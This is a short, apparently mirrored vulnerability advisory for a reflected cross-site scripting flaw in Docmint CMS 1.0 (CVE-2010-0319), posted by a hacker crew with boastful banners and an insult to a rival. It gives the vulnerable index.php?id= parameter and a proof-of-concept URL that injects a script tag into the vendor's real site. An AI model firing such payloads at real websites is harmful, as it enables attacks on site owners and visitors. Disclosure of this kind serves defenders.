Bug: Docmint CMS 1.0 cross site scripting (WLB-2010010046 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: Docmint CMS 1.0 cross site scripting
 Credit: ./Red-D3v1L
 Date: 2010.01.14
 CWE: CWE-79 (Show similar)
 CVE: CVE-2010-0319 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
Low
No
Yes

+===================================================================================+
./SEC-R1Z _ __ _ _ _ _ ___ _ _ _ _ __ _ _ _ _ _
/ /_ _ _ _ / _ _/ _ _ / < |/_ _ _ _ /
_ _ _ _/ /___ / / __ | |) / | | / /
_ _ _ _/ /___ / / | __ || / | | / /
_______ _ _ 2_0_0_9 | | | / /____
/_ _ _ _ _ _ _ _/ _ _ _ / |__| __ |__|/_ _ _ _ _ R.I.P MichaelJackson !!!!!
+===================================================================================+

[?] ~ Note : sEc-r1z CrEw# r0x !
==============================================================================
[?] Docmint Cms 1.0 (XSS) Cross Site Scripting Vulnerability
==============================================================================
[?] My home: [ http://sec-r1z.com ]
[?] Script: [ Docmint Cms 1.0 ]
[?] Language: [ PHP ]
[?] Vendor [http://www.docmint.net/]
[?] Founder: [ ./Red-D3v1L ]
[?] Gr44tz to: [ sec-r1z# Crew - Hackteach Team - My L0ve ~A~ ]
[?] Fuck To : [ Zombie_KsA << big big big L4m3r ]
########################################################################

===[ Exploit XSS ]===

[&#187;]Exploit : [Path]/index.php?id=[XSS Vuln]

[&#187;]dem0: http://www.docmint.net/index.php?id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E


==============================================================================

#sEc-r1z.com Str1kEz y0u !

References:

http://xforce.iss.net/xforce/xfdb/55549
http://www.securityfocus.com/bid/37721
http://www.exploit-db.com/exploits/11119
http://secunia.com/advisories/38149
http://packetstormsecurity.org/1001-exploits/docmintcms-xss.txt

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com